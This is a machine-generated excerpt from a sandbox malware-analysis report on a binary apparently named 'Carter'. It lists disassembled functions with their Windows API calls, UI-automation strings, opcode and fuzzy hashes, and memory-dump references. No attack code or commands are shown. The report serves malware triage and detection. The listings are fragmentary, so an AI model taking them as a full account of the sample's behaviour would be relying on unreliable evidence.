                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 3e35f9e68a8fbe481efd16a3cb9d2c74d8c3669fb1ccf777758c14cd8b1f3ff2
                                                                        • Instruction ID: 6f012c16fa3fa6abb24f9c295c0ffc07c658af24c19f630fff0be45f7b5193cc
                                                                        • Opcode Fuzzy Hash: 3e35f9e68a8fbe481efd16a3cb9d2c74d8c3669fb1ccf777758c14cd8b1f3ff2
                                                                        • Instruction Fuzzy Hash: 77A189302142429FDB14EF24C950AAEB7A9BF99354F10895CF9D69B2E2DB34EC05CB52
                                                                        Function 010556C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 010556E1
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 010556EC
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 010556F7
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 01055702
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0105570D
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 01055718
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 01055723
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 0105572E
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 01055739
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 01055744
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 0105574F
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 0105575A
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 01055765
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 01055770
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0105577B
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 01055786
                                                                        • GetCursorInfo.USER32(?), ref: 01055796
                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 010557C1
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                        • String ID:
                                                                        • API String ID: 3215588206-0
                                                                        • Opcode ID: cb6487facd3419580963d9355ab02094fe1686fcc2cf8a3ce620c4a5eaa21827
                                                                        • Instruction ID: e5afb2924574cf24796ede138e08680a47b9395739fcacf56fccfe8dd9884dd2
                                                                        • Opcode Fuzzy Hash: cb6487facd3419580963d9355ab02094fe1686fcc2cf8a3ce620c4a5eaa21827
                                                                        • Instruction Fuzzy Hash: 9C415470E043196ADB509FBA8C49D6FFFF8EF51B10B00456FE549E7290DAB8A401CE51
                                                                        Function 0103B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0103B17B
                                                                        • __swprintf.LIBCMT ref: 0103B21C
                                                                        • _wcscmp.LIBCMT ref: 0103B22F
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0103B284
                                                                        • _wcscmp.LIBCMT ref: 0103B2C0
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0103B2F7
                                                                        • GetDlgCtrlID.USER32(?), ref: 0103B349
                                                                        • GetWindowRect.USER32(?,?), ref: 0103B37F
                                                                        • GetParent.USER32(?), ref: 0103B39D
                                                                        • ScreenToClient.USER32(00000000), ref: 0103B3A4
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0103B41E
                                                                        • _wcscmp.LIBCMT ref: 0103B432
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0103B458
                                                                        • _wcscmp.LIBCMT ref: 0103B46C
                                                                          • Part of subcall function 0100385C: _iswctype.LIBCMT ref: 01003864
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                        • String ID: %s%u
                                                                        • API String ID: 3744389584-679674701
                                                                        • Opcode ID: 0bf2bf5120b8b62d0e10fb5dcadae6fcbcf24098b6969c170d5ac74dfc4693f3
                                                                        • Instruction ID: 03296ad7809f79a6197af31c0e4939488a4155d7492acb9f052480261b82cae6
                                                                        • Opcode Fuzzy Hash: 0bf2bf5120b8b62d0e10fb5dcadae6fcbcf24098b6969c170d5ac74dfc4693f3
                                                                        • Instruction Fuzzy Hash: ADA1B071604306AFD756DE28C884BEABBECFF84358F108629FAD992190DB30E555CB91
                                                                        Function 0103BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0103BAB1
                                                                        • _wcscmp.LIBCMT ref: 0103BAC2
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0103BAEA
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0103BB07
                                                                        • _wcscmp.LIBCMT ref: 0103BB25
                                                                        • _wcsstr.LIBCMT ref: 0103BB36
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0103BB6E
                                                                        • _wcscmp.LIBCMT ref: 0103BB7E
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0103BBA5
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0103BBEE
                                                                        • _wcscmp.LIBCMT ref: 0103BBFE
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0103BC26
                                                                        • GetWindowRect.USER32(00000004,?), ref: 0103BC8F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: b951f637cf9c63a8f12183b90d5274a929a263c4b85fe5e4b76ae1f1fc331b81
                                                                        • Instruction ID: 45db16fbbca70e1054964745fe2485b21c8e292b4afd0ccd173d61b22f523426
                                                                        • Opcode Fuzzy Hash: b951f637cf9c63a8f12183b90d5274a929a263c4b85fe5e4b76ae1f1fc331b81
                                                                        • Instruction Fuzzy Hash: D381A37100420A9FEB65DF18C885FAA7BDCFF84318F0485A9FEC99A096DB34D945CB61
                                                                        Function 0103B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: b75e2c9adb93d8c4e66f0d86ffdb1383fab5de4288420f1fc9f1f36e3331a022
                                                                        • Instruction ID: 068f52dbc5a67a51ef96d490b144075fea63a967ab6d68586e309d428cafd835
                                                                        • Opcode Fuzzy Hash: b75e2c9adb93d8c4e66f0d86ffdb1383fab5de4288420f1fc9f1f36e3331a022
                                                                        • Instruction Fuzzy Hash: 0C31F631A44209EADF11EB51CD13EFE77B8BF64350F20012AE5C1BA0E1EF596E00D691
                                                                        Function 0103CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 0103CBAA
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0103CBBC
                                                                        • SetWindowTextW.USER32(?,?), ref: 0103CBD3
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0103CBE8
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0103CBEE
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CBFE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0103CC04
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0103CC25
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0103CC3F
                                                                        • GetWindowRect.USER32(?,?), ref: 0103CC48
                                                                        • SetWindowTextW.USER32(?,?), ref: 0103CCB3
                                                                        • GetDesktopWindow.USER32 ref: 0103CCB9
                                                                        • GetWindowRect.USER32(00000000), ref: 0103CCC0
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0103CD0C
                                                                        • GetClientRect.USER32(?,?), ref: 0103CD19
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0103CD3E
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0103CD69
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: 560215e6fba6a8403412670bc6fc4345ecb58a6eb2c9ba992d03292f8c13b7f1
                                                                        • Instruction ID: 913e3761078ac1a2d942e38cebf8f9c72378e764eebc10d83f60658fdbe887e0
                                                                        • Opcode Fuzzy Hash: 560215e6fba6a8403412670bc6fc4345ecb58a6eb2c9ba992d03292f8c13b7f1
                                                                        • Instruction Fuzzy Hash: 89515E31900709AFEB209FA8CE89B6EBBF9FF48705F104619F686E2594C775A904CB50
                                                                        Function 0106A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0106A87E
                                                                        • DestroyWindow.USER32(00000000,?), ref: 0106A8F8
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0106A972
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0106A994
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0106A9A7
                                                                        • DestroyWindow.USER32(00000000), ref: 0106A9C9
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FE0000,00000000), ref: 0106AA00
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0106AA19
                                                                        • GetDesktopWindow.USER32 ref: 0106AA32
                                                                        • GetWindowRect.USER32(00000000), ref: 0106AA39
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0106AA51
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0106AA69
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 1297703922-3619404913
                                                                        • Opcode ID: 1168770422dd2f95b1492ecf8407463b03d4e1cef3bf27acd3d44e84d63cc365
                                                                        • Instruction ID: be51b315cc96fc4c9cd68744913cc545911b2b96892c003cddb31af1757a1b8e
                                                                        • Opcode Fuzzy Hash: 1168770422dd2f95b1492ecf8407463b03d4e1cef3bf27acd3d44e84d63cc365
                                                                        • Instruction Fuzzy Hash: 5071CB74640200AFE721DF28C808F6B7BE9FB89700F14465DFAC6A7295D776E902CB61
                                                                        Function 0106CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0106CCCF
                                                                          • Part of subcall function 0106B1A9: ClientToScreen.USER32(?,?), ref: 0106B1D2
                                                                          • Part of subcall function 0106B1A9: GetWindowRect.USER32(?,?), ref: 0106B248
                                                                          • Part of subcall function 0106B1A9: PtInRect.USER32(?,?,0106C6BC), ref: 0106B258
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0106CD38
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0106CD43
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0106CD66
                                                                        • _wcscat.LIBCMT ref: 0106CD96
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0106CDAD
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0106CDC6
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0106CDDD
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0106CDFF
                                                                        • DragFinish.SHELL32(?), ref: 0106CE06
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0106CEF9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: c02408a05d7b1616df33262b93aa026dd0c584d70a56b9fcf26b0b6b98585088
                                                                        • Instruction ID: 3ba86cc1fd9e4e90b96aac726a41c66c4f46ee29dc0389eb8b8084051dbf236e
                                                                        • Opcode Fuzzy Hash: c02408a05d7b1616df33262b93aa026dd0c584d70a56b9fcf26b0b6b98585088
                                                                        • Instruction Fuzzy Hash: 9F618771508301AFD711EF60CC88DABBBE8EF89710F000A1DF6D5961A1DB35AA09CB62
                                                                        Function 010482D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0104831A
                                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 01048323
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0104832F
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0104841D
                                                                        • __swprintf.LIBCMT ref: 0104844D
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 01048479
                                                                        • VariantInit.OLEAUT32(?), ref: 0104852A
                                                                        • SysFreeString.OLEAUT32(?), ref: 010485BE
                                                                        • VariantClear.OLEAUT32(?), ref: 01048618
                                                                        • VariantClear.OLEAUT32(?), ref: 01048627
                                                                        • VariantInit.OLEAUT32(00000000), ref: 01048665
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: 0d31a833b9034dc83b8e81aa2bb237cb4a75502e4460c1820ac19abb08566a8c
                                                                        • Instruction ID: b508af8edab950f381086577dbdd02c536b0c69e6c66233c8a12cae5b21afed0
                                                                        • Opcode Fuzzy Hash: 0d31a833b9034dc83b8e81aa2bb237cb4a75502e4460c1820ac19abb08566a8c
                                                                        • Instruction Fuzzy Hash: B3D1E4B1A04116DBEB60AFE5C8C4B7EBBF4BF05701F04C9AAE585AB194DB34D840CB91
                                                                        Function 010649CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 01064A61
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01064AAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: 84aaeeb0179097ae195a903ac0c5e48f9617eeda131c5d139b924ff258d91407
                                                                        • Instruction ID: e496985481998a9c30092cd7674a8c8b0b74d321789353c480f4daf99fe54285
                                                                        • Opcode Fuzzy Hash: 84aaeeb0179097ae195a903ac0c5e48f9617eeda131c5d139b924ff258d91407
                                                                        • Instruction Fuzzy Hash: 79917A342046059FDB14EF24C850AADB7E5BF94364F00885DE8D69B3A2CB35FD4ADB91
                                                                        Function 0104E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 0104E31F
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0104E32F
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0104E33B
                                                                        • __wsplitpath.LIBCMT ref: 0104E399
                                                                        • _wcscat.LIBCMT ref: 0104E3B1
                                                                        • _wcscat.LIBCMT ref: 0104E3C3
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0104E3D8
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E3EC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E41E
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E43F
                                                                        • _wcscpy.LIBCMT ref: 0104E44B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0104E48A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: 6c5d7962b36479aa0970447fb8c4b1dae14e05ce42e974be29290392c4361646
                                                                        • Instruction ID: 5b00147d54bd66c20c6539c9ee802baaa9d7dce4e737ec381a7272845988fc79
                                                                        • Opcode Fuzzy Hash: 6c5d7962b36479aa0970447fb8c4b1dae14e05ce42e974be29290392c4361646
                                                                        • Instruction Fuzzy Hash: CA618CB25042469FC710EF64C88499EB7E8FF89310F04896EF9C9C7251DB39E905CB92
                                                                        Function 0104A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0104A2C2
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0104A2E3
                                                                        • __swprintf.LIBCMT ref: 0104A33C
                                                                        • __swprintf.LIBCMT ref: 0104A355
                                                                        • _wprintf.LIBCMT ref: 0104A3FC
                                                                        • _wprintf.LIBCMT ref: 0104A41A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 311963372-3080491070
                                                                        • Opcode ID: 8a985b79b280e78e61a86b751b295d8a75c9e77284afc729401254950fd4536a
                                                                        • Instruction ID: cd4d74224218cc153e2ad66671129cb26094cb43054e8a967a5aa908b3d7cb51
                                                                        • Opcode Fuzzy Hash: 8a985b79b280e78e61a86b751b295d8a75c9e77284afc729401254950fd4536a
                                                                        • Instruction Fuzzy Hash: A5519F71940119EBDF25EBE0CD92EEEB779BF14340F104165F645B2061EB3A2E48EB50
                                                                        Function 01040065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
